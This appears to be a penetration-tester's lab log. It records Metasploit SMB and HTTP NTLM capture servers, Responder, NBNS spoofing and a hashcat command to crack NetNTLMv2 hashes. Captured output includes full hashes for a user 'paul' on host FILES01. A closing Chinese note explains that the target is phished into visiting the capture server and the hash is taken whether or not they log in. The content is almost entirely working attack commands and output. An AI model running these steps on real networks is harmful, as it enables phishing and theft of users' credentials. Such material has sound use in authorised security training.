sudo responder -I tun0
hashcat -h | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john_smb
JOHNPWFILE => /tmp/john_smb
msf6 auxiliary(server/capture/smb) > exploit
[*] Auxiliary module running as background job 0.
[*] JTR hashes will be split into two files depending on the hash format.
[*] /tmp/john_smb_netntlm for NTLMv1 hashes.
[*] /tmp/john_smb_netntlmv2 for NTLMv2 hashes.
[*] Server is running. Listening on 192.168.45.159:445
[*] Server started.
msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf6 auxiliary(spoof/nbns/nbns_response) > set SPOOFIP 192.168.45.159
SPOOFIP => 192.168.45.159
msf6 auxiliary(spoof/nbns/nbns_response) > set INTERFACE tun0
INTERFACE => tun0
msf6 auxiliary(spoof/nbns/nbns_response) > run
[*] Auxiliary module running as background job 2.
[-] Auxiliary failed: PCAPRUB::BPFError invalid bpf filter: ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `setfilter'
msf6 auxiliary(spoof/nbns/nbns_response) > [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:139:in `open_pcap'
[-] /usr/share/metasploit-framework/modules/auxiliary/spoof/nbns/nbns_response.rb:145:in `run'
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.219.211
[SMB] NTLMv2-SSP Username : FILES01\paul
[SMB] NTLMv2-SSP Hash : paul::FILES01:37deabe5fef5e9ae:6cf8e75e1fa372f9bdd3d2c687519959:010100000000000080aca5343b8dd901bb2665e62562c2aa000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080aca5343b8dd901060004000200000008003000300000000000000000000000002000007f1bd75bae0ffde594bca74c62b4d3cb1656aec27e52436eb09106e3ac6c5c580a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003100350039000000000000000000
msf6 > use auxiliary/server/capture/http_ntlm
msf6 auxiliary(server/capture/http_ntlm) > set srvhost 192.168.45.159
srvhost => 192.168.45.159
msf6 auxiliary(server/capture/http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf6 auxiliary(server/capture/http_ntlm) > set URIPATH /
URIPATH => /
msf6 auxiliary(server/capture/http_ntlm) > set JOHNPWFILE /home/kali/
JOHNPWFILE => /home/kali/
msf6 auxiliary(server/capture/http_ntlm) > exploit
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/capture/http_ntlm) >
[*] Using URL: http://192.168.45.159/
[*] Server started.
[*] 2023-05-23 02:09:31 -0400
NTLMv2 Response Captured from FILES01
DOMAIN: USER: paul
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:e0f7edf0bb767cbd51e727f62b6722c4 NT_CLIENT_CHALLENGE:01010000000000005bc6d7223d8dd9015bebf059764da56f0000000002000c0044004f004d00410049004e000000000000000000
当我们配置并运行模块后,攻击主机这边就会启用http服务。然后钓鱼让目标用户去访问即可。当目标用户访问后,就会弹框提示登录。这时无论对方是否真的登录,我们都会抓到其Net-NTLM v2 hash。